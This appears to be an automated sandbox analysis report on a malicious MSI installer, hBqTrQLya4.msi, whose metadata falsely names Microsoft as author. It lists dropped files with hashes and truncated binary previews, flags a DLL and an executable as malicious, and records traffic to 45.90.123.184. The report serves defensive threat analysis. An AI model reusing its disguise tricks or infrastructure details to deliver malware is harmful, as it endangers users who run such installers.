                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@........................... .../... .......................p..p............................`......................................................CODE................................ ..`DATA....p...........................@...BSS......................................idata.../... ...0..................@....tls.........P.......0...................rdata.......`.......0..............@..P.reloc..p....p.......2..............@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {32FF458D-4EB8-49EA-9D5C-9471CB31AE21}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jun 9 21:40:35 2024, Number of Pages: 200
                                                                    Category:dropped
                                                                    Size (bytes):31124992
                                                                    Entropy (8bit):7.9796246302652145
                                                                    Encrypted:false
                                                                    SSDEEP:786432:Ln1stHfbfy4zTE8R0BPtNg1LfjlszEJZ:GHfO4zTB8qF+zEJZ
                                                                    MD5:5421CD4BBB277EFC5B163A75CAC629FF
                                                                    SHA1:0D20C0BB978DAD6BBD9065EBFC20680C241AC1E0
                                                                    SHA-256:29772A95FB3ED50319DC74F8BE52963EE621DC151CCD94B10EA14A7123C268F7
                                                                    SHA-512:C8446D76F4EC65BC3D6A3174407F88E377C8AA260CCBED083653D114271A81A91F166A7AB45CA3D1CBDF9917F8B5AEBE87364DA210B9160607F2FE59A76D893C
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X...........................................................................................................................................................................................................................................................................................................................................................................=...................$...5....................................................................................... ...!..."...#...,...%...&...'...(...)...*...+...-.......3.../...0...1...2...6...4...>...A...7...8...9...:...;...<...........?...@.......B...C...D...E...F...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601920
                                                                    Entropy (8bit):6.469032452979565
                                                                    Encrypted:false
                                                                    SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                    MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                    SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                    SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                    SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%
                                                                    Joe Sandbox View:
                                                                    • Filename: CrzA2u67LQ.msi, Detection: malicious
                                                                    • Filename: HomeDesk.msi, Detection: malicious
                                                                    • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious
                                                                    • Filename: arquivo.msi, Detection: malicious
                                                                    • Filename: 25690.01808D.msi, Detection: malicious
                                                                    • Filename: fatKCMAGKKH.msi, Detection: malicious
                                                                    • Filename: SPMServer_2024.3.5.473.exe, Detection: malicious
                                                                    • Filename: SPMServer_2024.2.1.7.exe, Detection: malicious
                                                                    • Filename: SPMServer_2024.3.1.22.exe, Detection: malicious
                                                                    • Filename: Df.mes-25664.msi, Detection: malicious
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):856995
                                                                    Entropy (8bit):6.562536377822231
                                                                    Encrypted:false
                                                                    SSDEEP:24576:Q/EEimJH6g7scSzMQDC5lfCY/EEimJH6g7scSzMQDC5lfCk:SOmJH6g7sJzM+C5ZCaOmJH6g7sJzM+CX
                                                                    MD5:17B4C858EFC2042FE699799285EDFE75
                                                                    SHA1:1764FB5C6022DF773E99A6809CF327A3462EB31C
                                                                    SHA-256:A6AD50CF63B3D075A5DE37B0731173724FC59ABEA18027D808249F6DCA10A4D6
                                                                    SHA-512:843079919475A55A6D1260C5C453D7A398F5E1CD4FD303D10BBA51D46F3E2AC45C5A45DB155DDEB458B5E09606B6D2A545E1F675D383EBCA13C5817168E497C8
                                                                    Malicious:false
                                                                    Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..hBqTrQLya4.msi.@.....@?....@.....@........&.{32FF458D-4EB8-49EA-9D5C-9471CB31AE21}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@!....@.....@.]....&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}..C:\Users\user\Documents\.@.......@.....@.....@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}1.01:\Software\Microsoft\Aplicativo Windows\Version.@.......@.....@.....@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}..01:\Microsoft\.@.......@.....@.....@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}..01:\Microsoft\Windows\.@.......@.....@.....@......&.{4669957E-4874-4408-AF9D-19502B394F45}%.01:\Microsoft\Windows\CurrentVersion\.@.......@.....@.....@......&.{7FA
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):423936
                                                                    Entropy (8bit):6.554049394581909
                                                                    Encrypted:false
                                                                    SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                    MD5:768B35409005592DE2333371C6253BC8
                                                                    SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                    SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                    SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.1646265592897085
                                                                    Encrypted:false
                                                                    SSDEEP:12:JSbX72Fj6liAGiLIlHVRpZh/7777777777777777777777777vDHFyIRetVZMuiV:JLQI5txRetVG3iF
                                                                    MD5:B348D50A5EBD1FC20BDB2A954975E90C
                                                                    SHA1:3D6F53141F1DDBEB5ED8286DE604BDB55FD77ADC
                                                                    SHA-256:123C76DAACD54B8F781A53F091C5D6F1F418DFEC603D21BBC8DAF34D3DDDEFA2
                                                                    SHA-512:C1317A677636E5ED9166855182177FF11CB27F05AE27CB953D0F2B6C5346CFCC96F193746C426F9D2BE3B810DF2F186E1B32B0AC53587657A289CB984DBFCCD7
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.500686578197496
                                                                    Encrypted:false
                                                                    SSDEEP:48:i8PhQuRc06WXJMjT5LYHTQIIS+IKAE+lCyjMHMOIIS+IATk:NhQ1vjTuHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:4F3F06645AAF82E11FEC7D7316D9F1B1
                                                                    SHA1:2A4403CECFC6565C09C35D271738350B492ED1D6
                                                                    SHA-256:25538D9E15D5031309229C46D81181B48A624F82F0FD8F2989647747C8FEE6D9
                                                                    SHA-512:BBBEE804E9C990C00FB1DF146AD08E0BA55A5EA68AB8C876307BC0F7C22731DCB6B4CA6E5D29AD507DBF8DAD3DBA895E39752A80E28C84C7210DE7E03776F52C
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):360001
                                                                    Entropy (8bit):5.362959720932598
                                                                    Encrypted:false
                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauc:zTtbmkExhMJCIpEN
                                                                    MD5:81E0D20D7C8F136729896744EC090FF3
                                                                    SHA1:D0D3413A0BD009DBB96D1074C7D6F2CBB4C01B96
                                                                    SHA-256:5DE0CFD4C8F2A892FFC0E4DC9B746CFEC957CE999BBA1F46A1571D66D07A694F
                                                                    SHA-512:9E611285CDD9EE65E7233661265F7112BE0BC1468483EE277A1E8309172696EF8F294ABBF37547FE5635B52B61F74EBDED7484E1FC56C34C6C0BA14CE35449E0
                                                                    Malicious:false
                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.2073133061787735
                                                                    Encrypted:false
                                                                    SSDEEP:48:7nYu2I+CFXJnT5ZYHTQIIS+IKAE+lCyjMHMOIIS+IATk:zYq/TYHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:6EE82AF99BA5BCD65B2C4B2DBC883083
                                                                    SHA1:CA03795DF2E945B7916C393FAE3C6EB05E2A0A15
                                                                    SHA-256:95905231CC1A8DA5CA197C4917584020FE243A28D741806986AF7A4D18A3AFBA
                                                                    SHA-512:44AD7053B619F70853700D1EFFF6A5644859092A6050E05B1919D8406FD503CBF43E868CCA2FB9B6590D1F27285F4B27B70ED4BF4F6AC62C80F4933A90BF21C3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):0.1136616503924325
                                                                    Encrypted:false
                                                                    SSDEEP:24:eisoETxQIIipVQISQIIipVQIKAEVQoyjCyjMHVqewGpS+O7Bj+b:ZETSIIS+IRIIS+IKAE+lCyjMHMPTBO
                                                                    MD5:15E82E80C4ABBE38FA13AF4289DD2D91
                                                                    SHA1:D794B32B5CBD9906333CED0754020BD9BEA0410A
                                                                    SHA-256:4974150DD9DD9C74B02362C74065EDE478F39DA7F5B411892F321BF9752DED7F
                                                                    SHA-512:61240D8CC9E2D2D41679ED7B582B1F1BE2A01100BC0F21A41601565CCFC382FF746D0BAFD2B8772516D64D7348AA74C6DBB4C75DD72A6A4DC19A977284CD7906
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.500686578197496
                                                                    Encrypted:false
                                                                    SSDEEP:48:i8PhQuRc06WXJMjT5LYHTQIIS+IKAE+lCyjMHMOIIS+IATk:NhQ1vjTuHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:4F3F06645AAF82E11FEC7D7316D9F1B1
                                                                    SHA1:2A4403CECFC6565C09C35D271738350B492ED1D6
                                                                    SHA-256:25538D9E15D5031309229C46D81181B48A624F82F0FD8F2989647747C8FEE6D9
                                                                    SHA-512:BBBEE804E9C990C00FB1DF146AD08E0BA55A5EA68AB8C876307BC0F7C22731DCB6B4CA6E5D29AD507DBF8DAD3DBA895E39752A80E28C84C7210DE7E03776F52C
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.500686578197496
                                                                    Encrypted:false
                                                                    SSDEEP:48:i8PhQuRc06WXJMjT5LYHTQIIS+IKAE+lCyjMHMOIIS+IATk:NhQ1vjTuHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:4F3F06645AAF82E11FEC7D7316D9F1B1
                                                                    SHA1:2A4403CECFC6565C09C35D271738350B492ED1D6
                                                                    SHA-256:25538D9E15D5031309229C46D81181B48A624F82F0FD8F2989647747C8FEE6D9
                                                                    SHA-512:BBBEE804E9C990C00FB1DF146AD08E0BA55A5EA68AB8C876307BC0F7C22731DCB6B4CA6E5D29AD507DBF8DAD3DBA895E39752A80E28C84C7210DE7E03776F52C
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.07141373846089161
                                                                    Encrypted:false
                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOyDURetVZphQ1gVky6lit/:2F0i8n0itFzDHFyIRetVZMBit/
                                                                    MD5:2763C11149673C16DFF38A4E5A16FD4D
                                                                    SHA1:293641CA7B988592321DDF694D02BB7F6F18E8CA
                                                                    SHA-256:6EB33F09D3B24A471F66F9BCF048A86E2CD819CA04FA10A903577CDE39D7E99A
                                                                    SHA-512:A5AE65C012A15C2DC701D464542F9B224777012C2426E4F4BCAA94CCA7DD5D4DAD11386F4494A3EF000112C04943AF3EB54710AF805F52247DC7DD02287D59ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.2073133061787735
                                                                    Encrypted:false
                                                                    SSDEEP:48:7nYu2I+CFXJnT5ZYHTQIIS+IKAE+lCyjMHMOIIS+IATk:zYq/TYHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:6EE82AF99BA5BCD65B2C4B2DBC883083
                                                                    SHA1:CA03795DF2E945B7916C393FAE3C6EB05E2A0A15
                                                                    SHA-256:95905231CC1A8DA5CA197C4917584020FE243A28D741806986AF7A4D18A3AFBA
                                                                    SHA-512:44AD7053B619F70853700D1EFFF6A5644859092A6050E05B1919D8406FD503CBF43E868CCA2FB9B6590D1F27285F4B27B70ED4BF4F6AC62C80F4933A90BF21C3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.2073133061787735
                                                                    Encrypted:false
                                                                    SSDEEP:48:7nYu2I+CFXJnT5ZYHTQIIS+IKAE+lCyjMHMOIIS+IATk:zYq/TYHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:6EE82AF99BA5BCD65B2C4B2DBC883083
                                                                    SHA1:CA03795DF2E945B7916C393FAE3C6EB05E2A0A15
                                                                    SHA-256:95905231CC1A8DA5CA197C4917584020FE243A28D741806986AF7A4D18A3AFBA
                                                                    SHA-512:44AD7053B619F70853700D1EFFF6A5644859092A6050E05B1919D8406FD503CBF43E868CCA2FB9B6590D1F27285F4B27B70ED4BF4F6AC62C80F4933A90BF21C3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):275
                                                                    Entropy (8bit):5.251163667625441
                                                                    Encrypted:false
                                                                    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+knLd+wcXaoD:J0+oxBeRmR9etdzRxGezH0qjma+
                                                                    MD5:C40BF35CDBDC002FC8EB9CA79EFC9036
                                                                    SHA1:C0783FB3A5EA64B02977E8F584AA9B4DA361CC09
                                                                    SHA-256:FEB09AF0A64CF3CAD72182A02A29A666140E4B64E7BE23513F005062DE362A00
                                                                    SHA-512:AE091EB7F451675530080276932403CDE15462C75D70085184FE5DDE942A555904360240BDD30D23A8E0359ECE516DE9DE0C465AB253C8ED3F3E968E50272796
                                                                    Malicious:false
                                                                    URL:http://45.90.123.184/favicon.ico
                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 45.90.123.184 Port 80</address>.</body></html>.
                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {32FF458D-4EB8-49EA-9D5C-9471CB31AE21}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jun 9 21:40:35 2024, Number of Pages: 200
                                                                    Entropy (8bit):7.9796246302652145
                                                                    TrID:
                                                                    • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                    • Microsoft Windows Installer (60509/1) 46.00%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                    File name:hBqTrQLya4.msi
                                                                    File size:31'124'992 bytes
                                                                    MD5:5421cd4bbb277efc5b163a75cac629ff
                                                                    SHA1:0d20c0bb978dad6bbd9065ebfc20680c241ac1e0
                                                                    SHA256:29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7
                                                                    SHA512:c8446d76f4ec65bc3d6a3174407f88e377c8aa260ccbed083653d114271a81a91f166a7ab45ca3d1cbdf9917f8b5aebe87364da210b9160607f2fe59a76d893c
                                                                    SSDEEP:786432:Ln1stHfbfy4zTE8R0BPtNg1LfjlszEJZ:GHfO4zTB8qF+zEJZ
                                                                    TLSH:F9673325B38BC232D95D0276ED65FE2E0479FEA3473001D7B3E5796E88B18C11676A83
                                                                    File Content Preview:........................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X..............................................................................................
                                                                    Icon Hash:2d2e3797b32b2b99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 4, 2024 09:13:02.271785021 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:02.584104061 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:03.193296909 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:04.396430969 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:04.693345070 CEST | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:04.696674109 CEST | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:04.755840063 CEST | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:06.802700996 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:10.820626020 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:11.193347931 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:11.615242004 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:11.943345070 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:13.443437099 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:14.302737951 CEST | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:14.302741051 CEST | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:14.458970070 CEST | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:16.505856991 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:16.931978941 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:16.933156013 CEST | 49703 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:16.936795950 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:16.936863899 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:16.937910080 CEST | 80 | 49703 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:16.937974930 CEST | 49703 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:17.167999983 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:17.172849894 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:17.631432056 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:17.702599049 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:17.750442982 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:17.755593061 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:17.945689917 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:18.102313042 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:18.235829115 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:18.240844965 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:18.457103968 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
